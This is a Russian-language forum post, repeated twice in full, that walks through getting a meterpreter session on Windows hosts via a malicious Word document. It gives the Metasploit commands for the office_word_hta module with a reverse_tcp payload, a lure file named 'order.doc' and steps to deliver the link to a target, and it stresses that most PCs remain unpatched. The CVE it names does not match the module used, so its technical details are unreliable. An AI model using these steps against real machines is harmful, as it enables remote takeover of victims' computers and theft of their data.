AMRakm
Интересующийся
Интересующийся

AMRakm
Интересующийся
Интересующийся
- Сообщения
- 54
- Реакции
- 57
Эксплуатация уязвимости Microsoft Office CVE-2017-11826
Давайте посмотрим, как получить активную сессию meterpreter на удаленном хосте (Windows 8.1, Windows 7, Windows Server 2008). Для этого мы используем скрипт на Python, который генерирует файл RTF. Все необходимое включено в Metasploit Framework.
Соответствующий модуль создает вредоносный RTF — если открыть его в уязвимых версиях Word, выполнится код. Уязвимость состоит в том, что объект OLE может сделать запрос HTTP(S) и выполнить код HTA в ответ.
Приступим к эксплуатации
> use exploit/windows/fileformat/office_word_hta
> set srvhost 192.168.0.106
> set payload windows/meterpreter/reverse_tcp
> set filename order.doc
> set lhost 192.168.0.106
> exploit
Выделенная красным ссылка должна быть доставлена на целевой хост.
Если по ней перейти и запустить скачанный файл, откроется активная сессия meterpreter.
Набираем sysinfo, чтобы убедиться, что это победа.
Вывод
Мы изучили серьезную уязвимость, которая вовсю эксплуатируются в нашей среде. В новой версии Office баг уже в той или иной мере закрыт патчами и имеет некоторые ограничения, но 90% ПК используют предыдущие версии Office и уязвимость еще долгое время будут оставаться актуальной.
Давайте посмотрим, как получить активную сессию meterpreter на удаленном хосте (Windows 8.1, Windows 7, Windows Server 2008). Для этого мы используем скрипт на Python, который генерирует файл RTF. Все необходимое включено в Metasploit Framework.
Соответствующий модуль создает вредоносный RTF — если открыть его в уязвимых версиях Word, выполнится код. Уязвимость состоит в том, что объект OLE может сделать запрос HTTP(S) и выполнить код HTA в ответ.
Приступим к эксплуатации
> use exploit/windows/fileformat/office_word_hta
> set srvhost 192.168.0.106
> set payload windows/meterpreter/reverse_tcp
> set filename order.doc
> set lhost 192.168.0.106
> exploit

Выделенная красным ссылка должна быть доставлена на целевой хост.

Если по ней перейти и запустить скачанный файл, откроется активная сессия meterpreter.

Набираем sysinfo, чтобы убедиться, что это победа.

Вывод
Мы изучили серьезную уязвимость, которая вовсю эксплуатируются в нашей среде. В новой версии Office баг уже в той или иной мере закрыт патчами и имеет некоторые ограничения, но 90% ПК используют предыдущие версии Office и уязвимость еще долгое время будут оставаться актуальной.